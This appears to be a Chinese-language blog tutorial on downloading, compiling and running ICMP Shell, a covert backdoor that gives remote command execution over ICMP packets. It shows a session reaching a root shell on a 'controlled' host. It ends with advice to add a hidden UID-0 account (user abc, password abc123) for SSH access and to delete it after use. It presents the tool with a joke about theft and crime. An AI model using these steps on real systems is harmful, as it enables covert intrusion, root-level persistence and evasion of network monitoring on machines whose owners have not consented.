项目主页:http://sourceforge.net/projects/icmpshell/
一、下载及安装
wget http://nchc.dl.sourceforge.net/project/icmpshell/ish/v0.2/ish-v0.2.tar.gz tar zxvf ish-v0.2.tar.gz cd ISHELL-v0.2/ make linux
最后这一步是根据操作系统类型来选择的,可选的类型有:
[root@localhost ISHELL-v0.2]# make ------------------------------- Make with the OS from the list: 1.) linux 2.) bsd 3.) solaris ex: make bsd ------------------------------- [root@localhost ISHELL-v0.2]#
这里我选择make linux,编译完成后,会生成server端和client端两个程序文件。
二、用法
被控端:
[root@localhost ISHELL-v0.2]# ./ishd -h ICMP Shell v0.2 (server) - by: Peter Kieltyka usage: ./ishd [options] options: -h Display this screen -d Run server in debug mode -i <id> Set session id; range: 0-65535 (default: 1515) -t <type> Set ICMP type (default: 0) -p <packetsize> Set packet size (default: 512) example: ./ishd -i 65535 -t 0 -p 1024
如上所示,可以指定上面的几个值 ,也可以不指定,使用默认的。
控制端:
[root@localhost ISHELL-v0.2]# ./ish -h ./ish: invalid option -- 'h' ICMP Shell v0.2 (client) - by: Peter Kieltyka usage: ./ish [options] <host> options: -i <id> Set session id; range: 0-65535 (default: 1515) -t <type> Set ICMP type (default: 0) -p <packetsize> Set packet size (default: 512) example: ./ish -i 65535 -t 0 -p 1024 host.com
示例:
[root@localhost ~]# ./ish =i 1515 -t 0 -p 512 192.168.1.100 ICMP Shell v0.2 (client) - by: Peter Kieltyka -------------------------------------------------- Connecting to 192.168.1.100...done. # id uid=0(root) gid=0(root) (root) =unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 pwd / ifconfig eth0 Link encap:Ethernet HWaddr 52:54:00:06:6D:3D inet addr:192.168.1.100 Bcast:192.168.1.255 Mask:255.255.255.0 inet6 addr: fe80::5054:ff:fe06:6d3d/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:974905 errors:0 dropped:0 overruns:0 frame:0 TX packets:170128 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:436113015 (415.9 MiB) TX bytes:16672843 (15.9 MiB) [root@localhost ~]# ifconfig eth0 Link encap:Ethernet HWaddr 52:54:00:C6:61:24 inet addr:192.168.1.253 Bcast:192.168.1.255 Mask:255.255.255.0 inet6 addr: fe80::5054:ff:fec6:6124/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:1585200 errors:0 dropped:0 overruns:0 frame:0 TX packets:92714 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:209254584 (199.5 MiB) TX bytes:15311207 (14.6 MiB)
其他不多说,杀人越货,居家必备。不过公网连接时(中间跨越多个路由交换设备时),有遇输完命令没有回显的情况。而实际上命令已经得到执行。遇到这种情况,可以通过添加用户,再用ssh进行连接,用完再删除就行了。如下,添加一个abc用户,密码为abc123:
useradd -o -u 0 abc echo abc123 | passwd --stdin abc